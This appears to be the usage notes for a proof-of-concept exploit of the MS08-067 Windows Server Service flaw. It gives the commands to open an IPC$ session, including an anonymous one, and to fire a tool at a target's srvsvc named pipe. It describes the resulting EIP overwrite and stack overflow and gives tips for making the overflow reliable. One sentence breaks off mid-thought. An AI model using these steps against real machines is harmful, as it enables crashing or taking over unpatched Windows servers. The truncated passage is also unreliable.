|MS Windows Server Service Code Execution PoC (MS08-067)
In vstudio command prompt:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.
So play around a bit, you'll get it working reliably...